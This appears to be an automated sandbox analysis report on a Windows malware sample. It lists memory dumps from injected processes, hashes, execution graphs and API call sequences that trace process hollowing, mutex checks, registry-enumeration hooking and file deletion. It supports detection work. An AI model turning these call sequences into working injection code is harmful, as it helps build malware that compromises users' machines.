• Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
Similarity
• API ID: ExitThreadUser
• String ID:
• API String ID: 3424019298-0
• Opcode ID: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
• Instruction ID: bc72de932e0fa4b54f58ad44bb5737dfb27672e31d192ce4b9b4917607245898
• Opcode Fuzzy Hash: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
• Instruction Fuzzy Hash: BFC08C27630C0603CE18B37C2D4909839C4ED2102E3C05634A123C00A6D824709642A2
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
                                                                                                                                                                Total number of Nodes:105
                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                execution_graph 2501 ac08d9 2507 ac0cc4 2501->2507 2503 ac08e5 2510 ac0643 2503->2510 2505 ac08ef 2518 ac093e 2505->2518 2525 ac0c3f GetPEB 2507->2525 2509 ac0cc9 2509->2503 2511 ac0660 2510->2511 2527 ac067c 2511->2527 2513 ac0673 2533 ac06c2 2513->2533 2515 ac080f 2515->2505 2516 ac06b9 2516->2515 2537 ac0811 2516->2537 2519 ac0cc4 GetPEB 2518->2519 2521 ac094a 2519->2521 2520 ac0af1 2520->2505 2521->2520 2579 ac09d9 2521->2579 2524 ac09d2 2524->2520 2583 ac0af3 2524->2583 2526 ac0c4b 2525->2526 2526->2509 2526->2526 2528 ac0681 2527->2528 2529 ac06c2 4 API calls 2528->2529 2531 ac06b9 2529->2531 2530 ac080f 2530->2513 2531->2530 2532 ac0811 4 API calls 2531->2532 2532->2530 2535 ac06c7 2533->2535 2534 ac080f 2534->2516 2535->2534 2536 ac0811 4 API calls 2535->2536 2536->2534 2550 ac086e 2537->2550 2539 ac0840 2540 ac08c5 2539->2540 2541 ac0866 2539->2541 2543 ac08d9 2539->2543 2565 ac08d9 2540->2565 2541->2515 2555 ac1e62 2541->2555 2545 ac0cc4 GetPEB 2543->2545 2546 ac08e5 2545->2546 2547 ac0643 4 API calls 2546->2547 2548 ac08ef 2547->2548 2549 ac093e 4 API calls 2548->2549 2549->2548 2551 ac0873 2550->2551 2551->2539 2552 ac1e62 3 API calls 2551->2552 2553 ac08c7 2552->2553 2554 ac08d9 4 API calls 2553->2554 2554->2553 2556 ac1e73 2555->2556 2571 ac1d5a 2556->2571 2559 ac1d5a 3 API calls 2560 ac1eb9 2559->2560 2561 ac1d5a 3 API calls 2560->2561 2562 ac1ecc 2561->2562 2563 ac1d5a 3 API calls 2562->2563 2564 ac1edf 2563->2564 2564->2540 2566 ac0cc4 GetPEB 2565->2566 2567 ac08e5 2566->2567 2568 ac0643 4 API calls 2567->2568 2569 ac08ef 2568->2569 2570 ac093e 4 API calls 2569->2570 2570->2569 2572 ac1d6e 2571->2572 2573 ac1e60 2571->2573 2572->2573 2574 ac1d80 VirtualProtect 2572->2574 2573->2559 2574->2573 2575 ac1dac 2574->2575 2576 ac1daf VirtualAlloc 2575->2576 2576->2576 2577 ac1de1 2576->2577 2578 
ac1e09 VirtualProtect 2577->2578 2578->2573 2582 ac09de 2579->2582 2580 ac0af3 4 API calls 2581 ac0af1 2580->2581 2581->2524 2582->2580 2582->2581 2585 ac0b01 2583->2585 2586 ac0cc4 GetPEB 2585->2586 2587 ac0b0d 2586->2587 2592 ac0b27 2587->2592 2589 ac0b20 2591 ac0b57 2589->2591 2596 ac0b65 2589->2596 2593 ac0b2c 2592->2593 2594 ac0b65 4 API calls 2593->2594 2595 ac0b57 2594->2595 2595->2589 2597 ac0b6a 2596->2597 2602 ac08b3 2597->2602 2604 ac08b9 2602->2604 2606 ac08c7 2602->2606 2603 ac08d9 4 API calls 2603->2606 2605 ac1e62 3 API calls 2604->2605 2605->2606 2606->2603 2621 ac0b6b 2622 ac0b7d 2621->2622 2623 ac08b3 4 API calls 2622->2623 2624 ac0bb1 2623->2624 2625 ac0c3f GetPEB 2624->2625 2626 ac0bb6 2625->2626 2607 ac21d1 2610 ac21f2 2607->2610 2608 ac2211 NtEnumerateValueKey 2609 ac226c 2608->2609 2608->2610 2610->2608 2610->2609 2611 ac1e62 2612 ac1e73 2611->2612 2613 ac1d5a 3 API calls 2612->2613 2614 ac1ea6 2613->2614 2615 ac1d5a 3 API calls 2614->2615 2616 ac1eb9 2615->2616 2617 ac1d5a 3 API calls 2616->2617 2618 ac1ecc 2617->2618 2619 ac1d5a 3 API calls 2618->2619 2620 ac1edf 2619->2620

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph: rendered figure for the function at ac21d1-ac226f; its basic-block list is not reproduced here. The function calls NtEnumerateValueKey and the sub-function at ac2196.]
APIs
Memory Dump Source
• Source File: 00000004.00000002.2880966053.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
Similarity
• API ID: EnumerateValue
• String ID:
• API String ID: 1749906896-0
• Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
• Instruction ID: cdfd058294846393527a23a69d82aed125c299c38b3c44931be5a47ac5480816
• Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
• Instruction Fuzzy Hash: F3213D31518E5D8F8F55EF1C8809FEA37E1FB68755B42032AAC19E3200D730D98087C1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.2880966053.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: dd34eb1389eaef043c92a696ed53661b54a7e883a9eaaee22049f10a42ac24d8
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: E221F730B34C1D0BEB58A77C9859764F6D2E79C320F990299E91ED36E5ED58CC8183C6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph: rendered figure for the function at ac0811-ac08d4; its basic-block list is not reproduced here. The function calls the sub-functions at ac086e, ac1756, ac1e62, ac08d9, ac0cc4, ac14bc, ac0643, ac0ce8 and ac093e.]
APIs
Memory Dump Source
• Source File: 00000004.00000002.2880966053.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 23dfea852a366a571cc3348c698cc6744426d11f639f151413aad9b7f5eb2e10
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 9231E472000204AFEF017F709E86FBA3BACEF11300F424169BD85DA0A2EA7449658BB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 69
Total number of Limit Nodes: 4
[Execution graph: rendered figure; the raw node/edge list of the graph (functions in the 910000 region of svchost) is not reproduced here. API reached in the graph: GetPEB.]

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.2888530832.0000000000910000.00000040.00000001.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_910000_svchost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 0bb578ed6cec17c8f136f477abcb2608ff25218c2125ec3b643453ee16afebde
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: DE31D67220420C7FEB017B709D46BFA3B6CEF91300F4001A5BD85DA0A2DAB649D5CBB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 69
Total number of Limit Nodes: 4
[Execution graph: rendered figure; the raw node/edge list of the graph (functions in the 9a0000 region of svchost) is not reproduced here. API reached in the graph: GetPEB.]

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000006.00000002.2883996470.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_9a0000_svchost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 87a61ee7780fe3dd6be775b2a921c89204c80ea1769b2b74f3f30dd65b7be30b
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: DB31E6724102046FEB017B749D4ABBA7BACEF92310F000165BD85DA0A6EA7549648AFA
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 8.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 101
Total number of Limit Nodes: 4
[Execution graph: rendered figure; the raw node/edge list of the graph (functions in the a50000 region) is not reproduced here. APIs reached in the graph: GetPEB, VirtualProtect, VirtualAlloc.]

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2883830888.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: e5dc80538da9fb4d46b28acacc3c2bb4e555f0cc24faa64339f8904ee302d7fe
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: 9621D631A34C1D0BEB58A27C9859774F6E2F79C321F940295ED19D36D4ED68CC8183C6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2883830888.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: d9c953606555283b5bd9303adf5bc3df3a133a87740289e9a75d62b9567f8b42
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: D831C672410204AFEF017F709E87EBA3BACFF11312F440165FD95DA0A6EA744969CAB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 67
Total number of Limit Nodes: 5

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000008.00000002.2886142488.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d40000_svchost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 08b2109dcbf42d691bd0579a811ffb356924513e44b27f1ccfa88f3ac837c6f5
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: A631C672410244AFEB017B709D86ABA3FACEF11310F440165BE85DA0A6EA7449A5CAF5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 70
Total number of Limit Nodes: 4

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000009.00000002.2879609123.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b50000_StartMenuExperienceHost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: d0a9b7ccad2424afbd224703fef996352ea6b7a6d1d9ad784538435e3ee26c62
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 5E31D4720202046FEB017F709D86FBA3BECEF11312F0005E5BD95DA0A6EA744D69CAB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 7.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 80
Total number of Limit Nodes: 8

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2886842172.0000000000110000.00000040.00000001.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_110000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: e0c6e7e9a2d7599d1d0e12609d6689695a60be68487ad526544be4dcdcbfa815
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 4B31D6728042047FEB0A7B709D46AFA7B6CEF15300F000175BD85DA0A2EBB449D5CBB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 6.3%
Dynamic/Decrypted Code Coverage: 31.4%
Signature Coverage: 0%
Total number of Nodes: 462
Total number of Limit Nodes: 5
1c08b9 5530->5533 5541 1c08d9 5533->5541 5542 1c0cc4 GetPEB 5541->5542 5543 1c08e5 5542->5543 5544 1c14bc 3 API calls 5543->5544 5545 1c08ea 5544->5545 5549 1c0643 5545->5549 5548 1c08ef 5557 1c093e 5548->5557 5550 1c0660 5549->5550 5578 1c067c 5550->5578 5552 1c0673 5584 1c06c2 5552->5584 5554 1c080f 5554->5548 5555 1c06b9 5555->5554 5588 1c0811 5555->5588 5558 1c0cc4 GetPEB 5557->5558 5559 1c094a 5558->5559 5560 1c14bc 3 API calls 5559->5560 5561 1c094f 5560->5561 5562 1c0954 Sleep RtlExitUserThread OpenMutexA 5561->5562 5563 1c098f GetStartupInfoA 5562->5563 5564 1c0af1 5562->5564 5565 1c09d9 17 API calls 5563->5565 5564->5548 5573 1c09d2 5565->5573 5566 1c0a3d DuplicateHandle 5567 1c0aec 5566->5567 5568 1c0a82 WriteProcessMemory 5566->5568 5571 1c0af3 17 API calls 5567->5571 5568->5567 5570 1c0ab0 ResumeThread 5568->5570 5569 1c0a3c 5569->5566 5572 1c0ac1 Sleep OpenMutexA 5570->5572 5571->5564 5572->5564 5575 1c0ae7 5572->5575 5573->5566 5573->5569 5574 1c09de CreateProcessA 5573->5574 5574->5567 5576 1c09ee GetThreadContext 5574->5576 5575->5567 5575->5572 5576->5567 5577 1c0a16 VirtualProtectEx 5576->5577 5577->5567 5577->5569 5579 1c0681 5578->5579 5580 1c06c2 29 API calls 5579->5580 5582 1c06b9 5580->5582 5581 1c080f 5581->5552 5582->5581 5583 1c0811 29 API calls 5582->5583 5583->5581 5586 1c06c7 5584->5586 5585 1c080f 5585->5555 5586->5585 5587 1c0811 29 API calls 5586->5587 5587->5585 5590 1c0840 5588->5590 5589 1c08d9 29 API calls 5591 1c0863 5589->5591 5590->5589 5590->5591 5592 1c0866 5590->5592 5591->5592 5593 1c0cc4 GetPEB 5591->5593 5592->5554 5594 1c08e5 5593->5594 5595 1c14bc 3 API calls 5594->5595 5596 1c08ea 5595->5596 5597 1c0643 29 API calls 5596->5597 5599 1c08ef 5597->5599 5598 1c093e 29 API calls 5598->5599 5599->5598 5682 1c2f3f 5683 1c2f44 5682->5683 5684 1c2f4a lstrlen 5683->5684 5685 1c2f61 5684->5685 5309 2300000 5311 2300005 5309->5311 5326 2300ce8 5311->5326 5313 2300011 5329 23033ca 5313->5329 5315 2300016 5333 230098b OpenMutexA 
5315->5333 5318 230038f 5319 230002e 5319->5318 5322 2300697 5319->5322 5349 23006a0 5319->5349 5355 23006e6 5322->5355 5323 2300833 5324 23006dd 5324->5323 5359 2300835 5324->5359 5367 2300c63 GetPEB 5326->5367 5328 2300ced 5328->5313 5330 23033ea 5329->5330 5369 2303409 GetVolumeInformationA 5330->5369 5332 2303405 5332->5315 5334 23009b3 GetStartupInfoA 5333->5334 5335 230001b ExitProcess 5333->5335 5371 23009fd 5334->5371 5335->5319 5337 2300a60 5337->5335 5338 23009f6 5338->5337 5339 2300a02 CreateProcessA 5338->5339 5340 2300b10 5339->5340 5341 2300a12 GetThreadContext 5339->5341 5340->5335 5384 2300b17 5340->5384 5341->5340 5342 2300a3a VirtualProtectEx 5341->5342 5342->5340 5344 2300a65 DuplicateHandle 5342->5344 5344->5340 5345 2300aa6 WriteProcessMemory 5344->5345 5345->5340 5346 2300ad4 ResumeThread 5345->5346 5347 2300ae5 Sleep OpenMutexA 5346->5347 5347->5335 5348 2300b0b 5347->5348 5348->5340 5348->5347 5350 23006a5 5349->5350 5351 23006e6 3 API calls 5350->5351 5353 23006dd 5351->5353 5352 2300833 5352->5322 5353->5352 5354 2300835 3 API calls 5353->5354 5354->5352 5357 23006eb 5355->5357 5356 2300833 5356->5324 5357->5356 5358 2300835 3 API calls 5357->5358 5358->5356 5361 2300864 5359->5361 5360 2300887 5363 230088a 5360->5363 5364 2300ce8 GetPEB 5360->5364 5361->5360 5362 23008fd 3 API calls 5361->5362 5361->5363 5362->5360 5363->5323 5366 2300909 5364->5366 5365 2300962 3 API calls 5365->5366 5366->5365 5368 2300c6f 5367->5368 5368->5328 5368->5368 5370 230342b 5369->5370 5370->5332 5386 2303677 5371->5386 5373 2300a02 CreateProcessA 5374 2300b10 5373->5374 5375 2300a12 GetThreadContext 5373->5375 5377 2300b15 5374->5377 5378 2300b17 6 API calls 5374->5378 5375->5374 5376 2300a3a VirtualProtectEx 5375->5376 5376->5374 5379 2300a65 DuplicateHandle 5376->5379 5377->5338 5378->5377 5379->5374 5380 2300aa6 WriteProcessMemory 5379->5380 5380->5374 5381 2300ad4 ResumeThread 5380->5381 5382 2300ae5 Sleep OpenMutexA 5381->5382 5382->5377 5383 2300b0b 
5382->5383 5383->5374 5383->5382 5388 2300b25 5384->5388 5387 2303689 5386->5387 5387->5373 5387->5387 5389 2300ce8 GetPEB 5388->5389 5390 2300b31 5389->5390 5395 2300b4b 5390->5395 5392 2300b44 5401 2300b89 5392->5401 5396 2303677 5395->5396 5397 2300b50 LoadLibraryA 5396->5397 5398 2300b66 5397->5398 5399 2300b89 5 API calls 5398->5399 5400 2300b7b 5398->5400 5399->5400 5400->5392 5402 2300b8e 5401->5402 5403 2300bd0 5402->5403 5406 2300ba1 OpenProcess 5402->5406 5411 23008d7 5403->5411 5406->5403 5408 2300bb2 5406->5408 5408->5403 5409 2300bc8 ExitProcess 5408->5409 5412 23008dd 5411->5412 5418 23008fd 5412->5418 5419 2300ce8 GetPEB 5418->5419 5421 2300909 5419->5421 5422 2300962 5421->5422 5423 2300ce8 GetPEB 5422->5423 5424 230096e 5423->5424 5425 2300978 Sleep RtlExitUserThread 5424->5425 5686 1c292d 5687 1c3653 5686->5687 5688 1c2932 LoadLibraryA 5687->5688 5689 1c2948 5688->5689 5690 1c2961 VirtualAlloc 5689->5690 5690->5690 5691 1c2979 5690->5691 5709 1c29a6 5691->5709 5710 1c3653 5709->5710 5711 1c29ab lstrcat 5710->5711 5712 1c29c1 5711->5712 5726 1c29dd 5712->5726 5727 1c3653 5726->5727 5728 1c29e2 lstrcat 5727->5728 5729 1c29f8 5728->5729 5739 1c2a14 5729->5739 5740 1c3653 5739->5740 5741 1c2a19 lstrcat 5740->5741 5746 1c2a20 5741->5746 5743 1c2a8a DeleteFileA 5743->5746 5744 1c2ace DeleteFileA 5744->5746 5745 1c2b34 Sleep 5745->5746 5746->5743 5746->5744 5746->5745 5747 1c2b1e DeleteFileA 5746->5747 5748 1c2b4d 5746->5748 5747->5745 5750 1c2b5e 5748->5750 5749 1c2c41 Sleep 5749->5749 5749->5750 5750->5749 5752 1c2cf7 5750->5752 5753 1c2c99 5750->5753 5752->5746 5756 1c2b5e 5753->5756 5754 1c2cf7 5754->5750 5755 1c2c41 Sleep 5755->5755 5755->5756 5756->5753 5756->5754 5756->5755 5887 1c0b6b GetWindowThreadProcessId OpenProcess 5888 1c0bac 5887->5888 5889 1c0b8e 5887->5889 5890 1c08b3 29 API calls 5888->5890 5889->5888 5893 1c0ba4 ExitProcess 5889->5893 5891 1c0bb1 5890->5891 5892 1c0c3f GetPEB 5891->5892 5894 1c0bb6 5892->5894 5757 1c4d25 5758 1c4d4e 
5757->5758 5759 1c4d32 5757->5759 5759->5758 5760 1c4d44 SetEvent 5759->5760 5760->5758 5956 2300b8f 5957 2300ba1 OpenProcess 5956->5957 5958 2300bd0 5957->5958 5962 2300bb2 5957->5962 5959 23008d7 3 API calls 5958->5959 5960 2300bd5 5959->5960 5961 2300c63 GetPEB 5960->5961 5964 2300bda 5961->5964 5962->5958 5963 2300bc8 ExitProcess 5962->5963
APIs
  • Part of subcall function 0230098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 023009A5
  • Part of subcall function 0230098B: GetStartupInfoA.KERNEL32(00000000), ref: 023009BD
• ExitProcess.KERNEL32(00000000), ref: 0230001D
Memory Dump Source
• Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2300000_bin.jbxd
Similarity
• API ID: ExitInfoMutexOpenProcessStartup
• String ID:
• API String ID: 213680645-0
• Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction ID: e88d9ea6772d2559f086bc209dda1c598bc75ae7dcc9f24fe32f086cfc4925e1
• Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction Fuzzy Hash: B272CF6141E3C45FD72F9B604AF9B667F79AF03208B1A10CBD581DA0F3D6249A09C77A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1850846800.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_21f0000_bin.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: $1;$@$C[$R$d:$wJ$y7$v
• API String ID: 544645111-3459585926
• Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction ID: 28e5be904831581971660279813b2c29e89ec9c6c7ba3c7a11617b115dd6d7d6
• Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction Fuzzy Hash: 9F3277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNEL32(00001388), ref: 001C0959
• RtlExitUserThread.NTDLL(00000000), ref: 001C0961
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
• GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
  • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
  • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
  • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
  • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
  • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
  • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
  • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
  • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
Memory Dump Source
• Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
Similarity
• API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
• String ID:
• API String ID: 1099281029-0
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
• Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
• Sleep.KERNEL32(000007D0), ref: 001C3F5B
• Sleep.KERNEL32(00000BB8), ref: 001C3F6B
Memory Dump Source
• Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
• VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
• VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
Memory Dump Source
• Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                 • Legend: Executed / Not Executed
                                                                                                                                                                 • Graph (image omitted): a single block 2303409-2303462 calls GetVolumeInformationA and then the function at 2303634
                                                                                                                                                                APIs
                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(02303405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02303409
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationVolume
                                                                                                                                                                • String ID:
